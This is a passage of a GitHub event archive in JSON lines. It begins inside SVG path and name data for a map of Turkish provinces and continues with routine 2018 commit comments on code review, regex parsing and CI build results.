0.4-1.2-0.2-1.3-0.5-1.4-1-0.7-0.1-0.6 0.1-1.3 0.5-0.7 0.1-0.9-0.3-2.4-2-2.1-1.1-0.7-0.6 0.7-1.3 1.3-3.5 0.4-5.7-1.7-4.4-0.9-3.5 1.1-3.8 0.4-6 7-0.1 6.9-1.1 1.5-0.8 1.5-0.6 2.2 0.3 2.1 0.9 3.4 0 3.3-0.7 2.9-1.7 1.3-3.6 2.1-3.7 3.8-0.8 4.6 0.6z\",\r\n    TUR2288: \"M474 187l0.9 0.2 1.5 0.7 0.4 0.8 0.2 1.5 0.5 1.3 1.3 1.6 1.7 0.9 1 2 0.7 2.7 4.2 2.6 1.1 2-0.4 1.6 0.2 1.6 0.4 1.4 0.8 1.6 0.7 1.7-0.7 1.2-0.6 1.4-0.1 1.7 0 1.6-1.1 3.6-1.4 3.4 2.4 4.9 3.6 4.7-0.2 3.1 0.6 3.1-0.3 3.1-4.6 7.4-2.1 2.3-1.4 2.7-5.4 2.1-2.7-0.7-2.2-2.2-1.4-0.8-3.1 0.1-4.4 1.4-3-0.5-1.9-1.2-1.8-1.8-2.1-1.7-0.9-0.9-0.1-3.2 1.6-3.4-0.4-3-1.1-0.4-2.3 0.5-2.6-0.8-2.4-1.6-0.7-3.3 1.8-3.1 0.8-3.3-1.7-6 0.6-2.7 5.8 4.9 2.1-0.6-0.2-1.5-0.7-3 1.2-3.6 6.3-2.6 2.8-1.8 3.2-1.4 2.2-2.8-1.2-2.6-1.5-2.7 0.7-4.4-0.6-3.5-1.2-2-0.4-2.4 0.2-1.5 1.1-0.7 3.4 0.8 2.9-0.5z\",\r\n    TUR2289: \"M543.1 345.8l2.3-0.4 2.1 0.6 2.2 0.1 2.4-0.7 2.4 0.8 1.7 1.8 2 1.3 2.6 0 2.6-0.3 3.4 3.4 4.2 1.9 0.9 0.8 0.4 1.4 0.7 0.5 0.8 0.1 0.5 0.6-1.1 0 0.2 1.6-0.6 1.2-0.8 1.2-0.7 1.3-0.2 1.4 0 1.3-0.2 1.2-0.6 1.6-0.7 2.7 0 2.9-0.3 2.8-1.5 2.5-0.2 1 0.1 1.1 1 3.5 0.6 0.8 1.1 0.5 0.4 0.9 0.1 1.1-0.7 1.5 0.3 0.6 1.7 0.2 0.9 0.3 0.6 0.7 0.5 1 0.4 1.1 0.2 0.9 0 1.4-0.3 0.6-3.7 0.7-1 0-3.9-0.6-1 0.1-0.6 0.2-0.2 0.9-0.3 0.4-0.4 0.2-2.1-0.3-0.7-0.3-0.6-0.4-0.7-0.8-0.6 0.6 0.8 0.9-0.1 0.5-0.7 0.9-0.1 1-0.2 9.3 0.1 1.9-1.1 0.3-2-0.8-1.1 0.5-0.4 2.2-0.8 0.2-1.3-0.3-1.7 0.6-1.1 1.9-0.3 4.5-0.6 1.9-1 0.2-3-2.2-1.6-0.7-1.6-0.1-0.8-0.2-0.6-0.5-0.1-0.8 0.1-0.8 0-0.9-0.7-0.7-1 0.2-1 0.3-1.1 0.3-0.4-0.2 0.5-0.9 2.3-4 0.6-0.5-0.1-1.1-1.4-4.5-3.7-6.1-0.7-0.9-0.6-1.1-0.6-2-0.7-0.9-0.9-0.7-0.6-0.8-0.6-1.5 0.1-1 1.4-2.1 0.4-0.6 0.5-0.3 1.2-0.2 0.3-0.3 0.6-1.5 0.4-0.5 0.9-0.5 0.5-0.4 0.3-0.6 0.2-1.3 0.7-0.4 0.6-0.7 2-0.7 0.5-0.3 2.4-3 0.4-0.7 0.6-0.1 5.6-3.6 0.8-0.1 0.5-0.5 0.7-1.2 0.5-1.3 0.2-1 0-0.9-0.5-1.1-0.2-1.2 0-4.1-0.2-1-0.5-1.1-3.1-4.4-1.7-1.8-2-1.4-2-0.5-1.8 0.7-1.8 1.6-0.9 1.1-0.9-1.3 0-2.7 4.3-4.9 1-0.7 1.1 0.3 1.2 0.4z\",\r\n    TUR2286: \"M474 187l-2.9 0.5-3.4-0.8-1.1 0.7-0.2 1.5 0.4 2.4 1.2 2 0.6 3.5-0.7 4.4 1.5 2.7 1.2 2.6-2.2 2.8-3.2 1.4-2.8 1.8-6.3 2.6-1.2 3.6 0.7 3 0.2 1.5-2.1 0.6-5.8-4.9-1.1 0.2-2.3-0.3-1.1 0.3-2.6 1.6-2-1.9-0.8-2.6-2-1-1.2 0.1-2.1-0.4-0.7-1 0.3-2.3-3.2-1.2-0.7-0.7-1.7-0.8-2.8-0.2-1-0.8-0.9-1.3-0.7-0.6-0.9-0.3-2.6-2.2-5.9-3.7-1.1-3.8 5.9-10.3 8.4-6.8 3.6-5.7 2.4-7 8.3-8 1.1 1 1 1 2.9 0 2.7 2.6 2.6 3 2.4 0.8 4.1 0 1 1.5 0.5 1.5 0.6 1.4 7.2 8.9 2.3 1.5 2.6 0.5 2.3 1.9 1.3 3.2z\",\r\n    TUR2287: \"M578.8 240.8l-1.7 1.1-1 2-0.7 3.5-1.6 2.7-4 4.7-1.7 2.4-1.9 2-2.2-2.3-1.3-3.5-2-3.1-2.7-1.2-4.2 1.1-4 2.3-2.3 1.9-2.2 5.5-1.5 2-2.2 4.6-2.8 3.9-19.4 13.3 1.2 12.1-2.8 1.3-6.4-2.5-4.7-1.2-9-0.7 0.9-4.1 0.2-3.4 2.4-1.5-0.5-2.4-1.1-2.3-0.2-2.8 0.5-2.8-1.4-4.5-8.5-0.1-3-3.2-3.7-10.2 1.4-2.7 2.1-2.3 4.6-7.4 0.3-3.1-0.6-3.1 0.2-3.1-3.6-4.7-2.4-4.9 1.4-3.4 1.1-3.6 0-1.6 0.1-1.7 0.6-1.4 0.7-1.2 11.8 1.9 5.9-3.8 2.3-0.8 16.9-11 4.4-6.1 2.7 0.2 2.6 1.3 0.4 0.7 0.7 1.4 0.4 0.5 1.7 0.7 1.7 0.3 5 3.6 5.1 0.7 4-1.4 8.6 1.2 2.6 2 2.6 0.9 4.7-1.6 4.9 0 4.4 0.9 4.2 2.2 1.9 6-2.2 6.3-1.2 2.5-1 2.5-1.4 5.3-2.1 6.1-0.2 1.1-0.4 1-1.2 2.2-0.2 2.8z\",\r\n    TUR2284: \"M680 212.4l-3.7 0.2-1.4 1.9 0 2.8 0.9 1.7 0.6 1.9 0.3 4.2 0 1.4 0.6 2.1-0.2 0.4 0 0.9 0 0.7-0.7 0.2-5.7-0.5-1.4 0.2-0.6 0.8 0.4 1.1-0.3 1.2-0.7 1-0.7 0.4-1.3 0.2-1 0.6-0.8 0.9-0.6 1-0.6 1.9-0.8 1.4 0.2 0.5 0.3 0.4 0.2 0.6 0.1 1.1 0.5 1.4 0.7 1.2 0.8 0.7 0.6-0.6 0.6 0.3 0.9 1.2 0.7 0.6 0.7 0.4 0.7 0.2 3 0.4 1.4 0.4 1.1 1 1-0.3 4.3 2.2 1.5 0.1 3.1-1.2 1.7-0.2 1.2 0.9-0.4 0.5 1.4 1 0.4 0.4 1.2 1.9 0.1 0.4 1.3 0.2 0.9 0.6 1.5 1.4 1.9 0.3 4.2-1.5 2.2 0.3 0.9 1 0.6 1.4 0.2 1.6-1.7 6.1-2.4 2.7-2.8 1.4-2.3 0.5-2.1 1-1.4 0.3-1.5 0.1-3.8 0.8-3.6-0.6-3.7 0-3.1-0.8-0.8-0.6-0.9-0.4-0.4-1.4 1.1-0.7 2-1.9-0.2-2.2-3-0.6-3.1 0.9-3.7 0-3.8 4.4-3.3 5-4 2.2-1.4 2.6-0.1 3.5-3.2 2.8-4.3 1.1-1.9 0.9-1.8 0.6-2.3-0.3-2.2-0.7-4.8 0.7-4.6 1.9-7.4 1.4 2.1-3.9 2.7-9.7 1.2-2 0.8-0.8 1-1.6 0.3-2 2.9-7.6 0.3-2.7-2.5-4.5-4.1-1.9-3.6-1.1-6.6-3.9-7.8-1.7-1 0.1-1.9 0.4-0.9 0-0.6-3.9 3-5.2 3.1-1.4 2.6-2.5 2.7-3.1 1.1-0.4 2.3-1.5 3.7-4 0.8-2.5-0.3-1.5-0.6-1.4-0.9-3-0.5-3.2 1.1-2.6 2.3-0.6 4.4 2.2 4.4-0.9 1.8-1.3 2-0.8 1.9-1.3 1.9-0.9 4.1-0.1 1.7-0.8 1.9-0.3 3.5 0.5 3.4-1 3.7-2.9 4.1-1.4 4.1 2.1 5 0.3 2.3 0.9 2.2 1.3 3.4 4z\",\r\n    TUR2285: \"M476.9 321l1.7 3.9 1.9 3.7 2.5 1.9 0.2 6.7 1.2 3.8 2.4 1.8 3.2-0.1 2 2-1.5 4.1 0 3.7 0.7 3.7 0.2 1.8-0.2 1.8-1.9 1.8-2.2 0.6-2.8 1.9 0 0.1-1 0.2-0.7 0.3 0.3-1.3-0.7-0.4-2.1-2.3-4.3-2.2-0.3 0.4-1.5-0.8-2.3 0.5-3.4 1.6-1.6 0.3-0.6 0.2-1.6 0.9-0.3 0.3-0.5 1.2-0.3 0.3-1.6 0.9-4.5 4.1-5.7 3.6-1.6 1.4-4.5 5.7-0.4 1-0.2 0.6-0.5 0.5-1.1 0.5-1.9 1.9-1.8 1-0.1 1.7 0.3 2.1-0.1 1.7-1.1 0.9-1.6 0.3-1.4 0.5-0.5 1.4 0.3 0.1-1 1.3-0.4 0.8-0.2 1 0 0.7-0.3 0.5-0.9 0 0-0.4 0.5-1.2-0.3-1.8-0.8-1.6-1.1-0.7-0.7-0.3-0.7-0.4-0.6-0.2-0.8 0.7-1 1.6-0.9 0.9 0.3 0.4-0.6 0.5-0.8 1.4-1.1 0.3-1.8 0.8-0.4 0.3-1.6 1.7-0.2 0.7-0.3 1.8-0.5 0-1.3-2-0.2-0.9-0.5-0.3-0.7 0.2-0.7 0.3-1.2 1.1-1.2 1.5-1.1 1.1-1.2-0.2 0.7-0.4 0-0.4-1.2-0.2-2.2-0.6-1-0.1-1.2 0.2-1.8 1-0.8 0.1-2-0.7-1.1-0.1-0.9 1.1-1.2 0.2-2.3-0.1-1.5 0.5-0.6 0-0.7-0.1-1.1-0.6-0.5-0.2-1.2 0.4-0.7 0.8-0.5 1-0.7 0.9-0.5 0.4-0.9-0.4-0.7-0.1-1.6 0.1-3.5-0.8-1-0.1-3.3 1.8-0.6 0.2-0.5 0.7-2.8 2.2-2.2-0.1-4.7-1.1-2-1-3.1-2.1 0.1-0.4 0.8-1.3 0.4-1.5 0.2-1.7 0.7-1.7 0.9-1.6 0.8-3.1-0.3-7.2 0.5-3.8 3.4-0.4 3.4 0.9 3.2-0.1 2.9-1.3 3.1-0.8 3.2 0.2 1.7-0.3 1.2-1.2 0.7-2.4 0.7-2.1 0.7-0.3 0.8-0.2 1.9 1 2 0.8 1.3-1.7-1.2-2-2.4-1.8-2.8-0.7-1.1-0.9-1-1.3-1.3-0.6-0.7-1.7-0.5-1.9-0.9-1.5-1.1-1.3-0.1-2.1 2-0.4 0.8-0.3 2.4-1.5 1.5-0.6 0.7 0.4 0.5 1.2 1.9 0.5 1.1-1.9 0.6-2.9 1.7-2 2-0.6 1.7-1.3 1.7-1.5 1.9-1.2 2.1-0.6 6.6-0.6 4.2-1.6 4.3-0.4 1.8 0.6 1.3-0.2 1.9-1 3.8-0.7 5-3.9 1.9-0.8 3.9-0.3 3.7-1.4 1.8-2.2 1.4-0.8 4.5-1.6 3-1.5 2.3-2.2 1.6-0.9 2.7-0.9 1-0.7 0.6-2.1 3.9-0.1 1.8-0.6 1.6-1 3.6-1.6 3.7 0.9z\",\r\n    TUR2282: \"M764.1 248.9l-17.5 0.6-0.8-0.4-1.8-1.4-1.2-0.6-2.4 0.5-0.8 2.1-1.1 2.2-1.3 2-1.6 1.1-1.8 0.6-4-0.3-3.9 0.4-1.5 0.8-4 0.6-2.2 1-4.5-0.4-4.3-1.1-7.1 1.2-2.2-0.3-4.2 1.5-1.9-0.3-1.5-1.4-0.9-0.6-1.3-0.2-0.1-0.4-1.2-1.9-0.4-0.4-1.4-1 0.4-0.5-1.2-0.9-1.7 0.2-3.1 1.2-1.5-0.1-4.3-2.2-1 0.3-1.1-1-1.4-0.4-3-0.4-0.7-0.2-0.7-0.4-0.7-0.6-0.9-1.2-0.6-0.3-0.6 0.6-0.8-0.7-0.7-1.2-0.5-1.4-0.1-1.1-0.2-0.6-0.3-0.4-0.2-0.5 0.8-1.4 0.6-1.9 0.6-1 0.8-0.9 1-0.6 1.3-0.2 0.7-0.4 0.7-1 0.3-1.2-0.4-1.1 0.6-0.8 1.4-0.2 5.7 0.5 0.7-0.2 0-0.7 0-0.9 0.2-0.4-0.6-2.1 0-1.4-0.3-4.2-0.6-1.9-0.9-1.7 0-2.8 1.4-1.9 3.7-0.2 1.4-0.7 1.6-0.3 2 3 0.1 2-0.8 1.7 0 1.9 2.2 2.2 1.5 0 4.1-1.1 4.1-0.3 2.2 1 1.6-0.3 0.5 0 1.6 1 1.7 0.1 2.1 0.7 2.1 0.2 2.4 1.1 2.3 1.6 2.3 0.7 1 0.7 1.2 1.5 1.3-0.3 1.3 0.6 1.3 0.4 1.6-1.1 1.3-1.7 1.8-0.4 1.9 0.1 5-0.3 4.9-1.9 3.2-3.6 1.4-2.8 0.7-3.2-0.2-2.3-0.6-2.6 0.7-1.1 1-0.7 2.6-0.6 2.8-0.2 11.9-6.4 1.8-0.6 4.3-1.9 1.6 3.2-2.2 4.3-2.6 3.7-1 4.7 1.2 5.2 3.2 3.9 0.9 2.2-0.3 2.4-0.7 2.6-1 1.8-1.7-0.6-1.6-0.3-2.4 7.1 2.8 4.2 0.5 2.9 0.2 3.1z\",\r\n    TUR2283: \"M606.8 240.5l-3 5.2 0.6 3.9 0.9 0 1.9-0.4 1-0.1 7.8 1.7 6.6 3.9 3.6 1.1 4.1 1.9 2.5 4.5-0.3 2.7-2.9 7.6-0.3 2-1 1.6-0.8 0.8-1.2 2-2.7 9.7-2.1 3.9-2.5 3.2-2.9 2.6-2.1 2.6 0 3.9 1.8 3 3.1 1.1 5.7 3.5-0.1 2 0.4 1.9-0.7 3-2.2 1.5-3.3-0.1-3.3 0.4-7 2.5-6.5 1.1-2.9 1.5-4.7 5-4-1.3-1.5-5.9-2.6-1.6-2.4 3.4-6.3 2.9-2.3-3.4-2.8-2.6-1.8-1.3-2-0.5-5.7 1.1-2 0.8-1.7 0.3-0.9-1-1.3 0.5-0.5 0.3-0.3 0.6-0.5 0.1-2.2-2.6-0.2-4.4-0.6-0.8-0.7-0.7-0.6-1.9 0.4-2 1.5-1.6 1.1-1.9 0.1-5.2 1.4-1.9 1-0.5 1.7-1.7 0.2-2.7-1.7-4.1-0.3-3.1 0.1-2 0.6-4.4 1.6-4.2 2.6-11.8 1.6-4.1 2.9-2.8 1.9-2 1.7-2.4 4-4.7 1.6-2.7 0.7-3.5 1-2 1.7-1.1 6.9-1.7 6.8 0.9 1.3 0.9 1.3 0.6 11.7-1z\",\r\n    TUR2281: \"M702.3 267.9l1.3 0.9 4.2-1.8 1.6 1.7 0.2 1.8-0.4 1.5-1.2 2.7 0.5 0.9-0.5 0.8-1.9 1.4-2 1.5-3.2 0.9-0.9 0.5-0.6 0.8-0.2 0.9-0.3 2.2-0.5 1-0.7 0.5-2.6 0.8 0.6 1 0 0.8-0.3 0.9-0.6 0.9 0.4 0.8-0.1 0.6-0.3 0.5-1.4-0.4-0.4-0.1-0.8 0.3-0.7 0.6-0.6 0.8-0.4 1 0.7-0.2 1.5-1 0.6-0.1 0.6 0.5-0.1 1.7 0.6 0.9-1 0.3-1.2 0.1-1 0.2-0.7 0.8 0.4 0.3 1.4 1.5-0.8 0.5-0.5 0-0.9-0.6-0.3 0.3-0.6 0.7-0.8 0.4-0.7-0.1-0.8-0.8-1 0.7 0.9 1 2.6 2-11.6 1.8-2.5 2.7-0.5 0.2-0.7 1.2-3.1 3.3-1.1 0.7-6.4 1.1-1.6-0.7-3 1.2-0.6 0-0.3 1.5-0.8 0.3-2.3-0.3-0.4 0.4-0.1 1.6-0.6 0.7-0.5-0.1 0-0.6-0.3-0.1-2.3-0.6-0.9-0.5-0.7-0.8-1.5 1.1-0.6 0-0.8-0.6-4.1-3.6-6.1-2.3-5.7-0.1-5.7 1.2-5.7-3.5-3.1-1.1-1.8-3 0-3.9 2.1-2.6 2.9-2.6 2.5-3.2 7.4-1.4 4.6-1.9 4.8-0.7 2.2 0.7 2.3 0.3 1.8-0.6 1.9-0.9 4.3-1.1 3.2-2.8 0.1-3.5 1.4-2.6 4-2.2 3.3-5 3.8-4.4 3.7 0 3.1-0.9 3 0.6 0.2 2.2-2 1.9-1.1 0.7 0.4 1.4 0.9 0.4 0.8 0.6 3.1 0.8 3.7 0 3.6 0.6 3.8-0.8 1.5-0.1 1.4-0.3 2.1-1 2.3-0.5 2.8-1.4 2.4-2.7z\"\r\n  },\r\n  names: {\r\n    TUR3042: \"Batman\",\r\n    TUR3017: \"Sanliurfa\",\r\n    TUR3045: \"Tunceli\",\r\n    TUR2242: \"Tekirdag\",\r\n    TUR3026: \"Yozgat\",\r\n    TUR3031: \"Gümüshane\",\r\n    TUR3011: \"Konya\",\r\n    TUR2273: \"Burdur\",\r\n    TUR2272: \"Afyonkarahisar\",\r\n    TUR2271: \"Antalya\",\r\n    TUR2270: \"Kastamonu\",\r\n    TUR2277: \"Manisa\",\r\n    TUR2276: \"Kütahya\",\r\n    TUR2275: \"Isparta\",\r\n    TUR2274: \"Denizli\",\r\n    TUR2278: \"Mugla\",\r\n    TUR4839: \"Ardahan\",\r\n    TUR4842: \"Osmaniye\",\r\n    TUR3048: \"Van\",\r\n    TUR2239: \"Çanakkale\",\r\n    TUR2238: \"Balikesir\",\r\n    TUR3021: \"Aksaray\",\r\n    TUR3020: \"Nigde\",\r\n    TUR2310: \"Mus\",\r\n    TUR2311: \"Bitlis\",\r\n    TUR2230: \"Izmir\",\r\n    TUR2291: \"Çorum\",\r\n    TUR2290: \"Amasya\",\r\n    TUR2293: \"Ordu\",\r\n    TUR2292: \"Giresun\",\r\n    TUR2295: \"Sivas\",\r\n    TUR2294: \"Sinop\",\r\n    TUR2297: \"Tokat\",\r\n    TUR2296: \"Samsun\",\r\n    TUR2299: \"Erzurum\",\r\n    TUR2298: \"Artvin\",\r\n    TUR5520: \"Karabük\",\r\n    TUR5521: \"Bartın\",\r\n    TUR5518: \"Yalova\",\r\n    TUR3041: \"Mardin\",\r\n    TUR4840: \"Iğdir\",\r\n    TUR3009: \"Çankiri\",\r\n    TUR2263: \"Bilecik\",\r\n    TUR2264: \"Bursa\",\r\n    TUR2265: \"Istanbul\",\r\n    TUR2266: \"Kocaeli\",\r\n    TUR2267: \"Sakarya\",\r\n    TUR2268: \"Bolu\",\r\n    TUR2269: \"Eskisehir\",\r\n    TUR2240: \"Edirne\",\r\n    TUR2241: \"Kirklareli\",\r\n    TUR3044: \"Sirnak\",\r\n    TUR5519: \"Düzce\",\r\n    TUR3019: \"Kinkkale\",\r\n    TUR3012: \"Karaman\",\r\n    TUR3043: \"Siirt\",\r\n    TUR4841: \"Kilis\",\r\n    TUR3018: \"Adana\",\r\n    TUR2229: \"Aydin\",\r\n    TUR2309: \"Diyarbakir\",\r\n    TUR2308: \"Bingöl\",\r\n    TUR2307: \"Agri\",\r\n    TUR3016: \"Gaziantep\",\r\n    TUR3008: \"Ankara\",\r\n    TUR3010: \"Zinguldak\",\r\n    TUR2302: \"Trabzon\",\r\n    TUR2301: \"Rize\",\r\n    TUR2300: \"Erzincan\",\r\n    TUR3032: \"Bayburt\",\r\n    TUR3014: \"Usak\",\r\n    TUR3040: \"Kars\",\r\n    TUR3047: \"Hakkari\",\r\n    TUR2288: \"Nevsehir\",\r\n    TUR2289: \"Hatay\",\r\n    TUR2286: \"Kirsehir\",\r\n    TUR2287: \"Kayseri\",\r\n    TUR2284: \"Malatya\",\r\n    TUR2285: \"Mersin\",\r\n    TUR2282: \"Elazig\",\r\n    TUR2283: \"K. Maras\",\r\n    TUR2281: \"Adiyaman\"\r\n  },\r\n  default_regions: {},\r\n  proj: \"mercator\",\r\n  default_labels: {},\r\n  proj_coordinates: [\r\n    {\r\n      lat: 40.508566,\r\n      x: 401.7,\r\n      lng: 33.348715,\r\n      y: 111.5\r\n    },\r\n    {\r\n      lat: 40.500286,\r\n      x: 403.7,\r\n      lng: 33.387188,\r\n      y: 112.1\r\n    },\r\n    {\r\n      lat: 40.239632,\r\n      x: 280.5,\r\n      lng: 31.0238,\r\n      y: 129.9\r\n    }\r\n  ],\r\n  initial_view: {\r\n    x2: 1008.99,\r\n    x: 0.99,\r\n    y2: 466.11,\r\n    y: -37.88999999999999\r\n  }\r\n}"}},"created_at":"2018-07-12T01:09:52Z"}
{"id":"7953385501","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29678922,"position":41,"line":41,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:11:22Z","updated_at":"2018-07-12T01:11:22Z","author_association":"NONE","body":"Raise an exception if there's an item in `ci_engines_used` which is not supported by `CI_PROVIDERS_META`"}},"created_at":"2018-07-12T01:11:22Z"}
{"id":"7953387112","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29678927,"position":15,"line":15,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:12:03Z","updated_at":"2018-07-12T01:12:03Z","author_association":"NONE","body":"`CircleCI`"}},"created_at":"2018-07-12T01:12:03Z"}
{"id":"7953389342","type":"CommitCommentEvent","actor":{"login":"StrikerRUS"},"repo":{"name":"Microsoft/LightGBM"},"payload":{"comment":{"id":29678932,"position":19,"line":223,"path":"src/io/config.cpp","commit_id":"1e53445e85fe7d9597a274e4ddc1b1af190d0a64","created_at":"2018-07-12T01:12:56Z","updated_at":"2018-07-12T01:12:56Z","author_association":"COLLABORATOR","body":"@guolinke \r\n\r\nTypo here: `objective`.\r\n\r\nCan't this change hurt this feature?\r\nhttps://github.com/Microsoft/LightGBM/blob/1e53445e85fe7d9597a274e4ddc1b1af190d0a64/include/LightGBM/config.h#L662"}},"created_at":"2018-07-12T01:12:56Z"}
{"id":"7953398121","type":"CommitCommentEvent","actor":{"login":"mouhamedsbz"},"repo":{"name":"blockchain/api-v1-client-python"},"payload":{"comment":{"id":29678958,"position":null,"line":null,"path":null,"commit_id":"f55d281a18586d3e1321b19d62c382007d3a6a45","created_at":"2018-07-12T01:16:22Z","updated_at":"2018-07-12T01:16:22Z","author_association":"NONE","body":"34a20-12fee \r\n83fe1-6bf9f \r\n2be86-d8fbe \r\n612a3-f43e9 \r\ndbbe1-72102 \r\ne1591-ec603 \r\n4f4d9-98573 \r\n49ed1-91997 \r\ncb2bf-0d0b7 \r\nceac5-e90ea \r\nf5fb2-3bc9a \r\n40de4-298bd \r\n045a8-841df \r\n4a762-2b405 \r\nebc7d-73c1b \r\n4078f-da6d4"}},"created_at":"2018-07-12T01:16:22Z"}
{"id":"7953403903","type":"CommitCommentEvent","actor":{"login":"johnhawkinson"},"repo":{"name":"freelawproject/juriscraper"},"payload":{"comment":{"id":29678967,"position":null,"line":null,"path":null,"commit_id":"0e7841e3efd6ceb75be038705b53a7e5c5277fc2","created_at":"2018-07-12T01:18:41Z","updated_at":"2018-07-12T01:18:41Z","author_association":"CONTRIBUTOR","body":"It was just two weeks (June 27) ago that I said I thought our docket number regex was way too complicated and restrictive, and that:\r\n\r\n> Looking at the page, we probably should have been looking for the bold `#:` instead:\r\n\r\n```html\r\n<td>\r\n  <b>  Court of Appeals Docket #: </b>\r\n  18-1281\r\n</td>\r\n```\r\n\r\nNow, that's not quite true for MDL/JPML, because it is:\r\n\r\n```html\r\n<h3 align=\"center\">United States Judicial Panel on Multidistrict Litigation<br>\r\n+CIVIL DOCKET FOR CASE #: MDL No. 2168</h3>\r\n```\r\n\r\nBut I still think the correct answer is we should be taking what follows the `#:`, rather than these highly restrictive regexps."}},"created_at":"2018-07-12T01:18:41Z"}
{"id":"7953405775","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29678975,"position":41,"line":41,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"9f3d8c0599edfc3c9fbb63ebf5b85c94abd34c79","created_at":"2018-07-12T01:19:30Z","updated_at":"2018-07-12T01:19:30Z","author_association":"NONE","body":"Thus remove the if in line `44`, "}},"created_at":"2018-07-12T01:19:30Z"}
{"id":"7953405845","type":"CommitCommentEvent","actor":{"login":"ddaaggeett"},"repo":{"name":"ddaaggeett/podware"},"payload":{"comment":{"id":29678976,"position":20,"line":45,"path":"index.js","commit_id":"cabd34005c9befb1678428ff43a3838678dbc78e","created_at":"2018-07-12T01:19:32Z","updated_at":"2018-07-12T01:19:32Z","author_association":"OWNER","body":"TODO: don't rely on setTimeout. improve confirmation camera is up and running"}},"created_at":"2018-07-12T01:19:32Z"}
{"id":"7953406783","type":"CommitCommentEvent","actor":{"login":"stennie"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":29678981,"position":null,"line":null,"path":null,"commit_id":"2b5fa7f5120ea0387117058afe9947b78217b0d7","created_at":"2018-07-12T01:19:56Z","updated_at":"2018-07-12T01:19:56Z","author_association":"MEMBER","body":"This actually fixes #4668 (incorrect issue # in the commit message)"}},"created_at":"2018-07-12T01:19:56Z"}
{"id":"7953408041","type":"CommitCommentEvent","actor":{"login":"kvhnuke"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29678986,"position":null,"line":null,"path":null,"commit_id":"470e7ac6333c6f7f4003bb6a82a96b82c57cbc60","created_at":"2018-07-12T01:20:25Z","updated_at":"2018-07-12T01:20:25Z","author_association":"CONTRIBUTOR","body":"https://www.mewbuilds.com/build/470e7ac6333c6f7f4003bb6a82a96b82c57cbc60"}},"created_at":"2018-07-12T01:20:25Z"}
{"id":"7953408298","type":"CommitCommentEvent","actor":{"login":"RubenGuaman"},"repo":{"name":"RubenGuaman/RepositorioRC"},"payload":{"comment":{"id":29678987,"position":null,"line":null,"path":null,"commit_id":"e9acad2c3673a02a95a4e0bde63300fff31d835d","created_at":"2018-07-12T01:20:31Z","updated_at":"2018-07-12T01:20:31Z","author_association":"OWNER","body":"[](url)"}},"created_at":"2018-07-12T01:20:31Z"}
{"id":"7953408734","type":"CommitCommentEvent","actor":{"login":"anjia0532"},"repo":{"name":"anjia0532/lua-resty-maxminddb"},"payload":{"comment":{"id":29678989,"position":null,"line":null,"path":null,"commit_id":"d610f4e0b82966ead8f917b7dba2c0abceb6b3d4","created_at":"2018-07-12T01:20:41Z","updated_at":"2018-07-12T01:20:41Z","author_association":"OWNER","body":"fixed https://github.com/anjia0532/lua-resty-maxminddb/issues/8\r\nfixed https://github.com/anjia0532/lua-resty-maxminddb/issues/7"}},"created_at":"2018-07-12T01:20:41Z"}
{"id":"7953409358","type":"CommitCommentEvent","actor":{"login":"picklechips"},"repo":{"name":"CGUC/grapp-server"},"payload":{"comment":{"id":29678993,"position":52,"line":222,"path":"models/Posts.js","commit_id":"a01875304fb0587d16244c0279f7105b3d9180eb","created_at":"2018-07-12T01:20:56Z","updated_at":"2018-07-12T01:20:56Z","author_association":"MEMBER","body":"Yeah you're right, feel free to change it"}},"created_at":"2018-07-12T01:20:56Z"}
{"id":"7953413349","type":"CommitCommentEvent","actor":{"login":"IndieBioAccel"},"repo":{"name":"IndieBioAccelerator/DataWiki"},"payload":{"comment":{"id":29679006,"position":5,"line":3,"path":"README.md","commit_id":"b51df25b6ea7e60ca5ff41ca66f5f442a57a646b","created_at":"2018-07-12T01:22:35Z","updated_at":"2018-07-12T01:22:35Z","author_association":"CONTRIBUTOR","body":"Yo yo"}},"created_at":"2018-07-12T01:22:35Z"}
{"id":"7953414729","type":"CommitCommentEvent","actor":{"login":"kylesethgray"},"repo":{"name":"kylesethgray/Share-Your-Rings"},"payload":{"comment":{"id":29679009,"position":null,"line":null,"path":null,"commit_id":"ceb4398feb4b21267f8f2b79a7a7e1908011a79d","created_at":"2018-07-12T01:23:11Z","updated_at":"2018-07-12T01:23:11Z","author_association":"OWNER","body":"![197e4455-6f09-474d-b5eb-ff681446f42c](https://user-images.githubusercontent.com/3441599/42607396-d80da4e4-853f-11e8-9573-0a1c54c2e7fe.jpeg)\r\n"}},"created_at":"2018-07-12T01:23:11Z"}
{"id":"7953429595","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679038,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-12T01:29:23Z","updated_at":"2018-07-12T01:29:23Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a 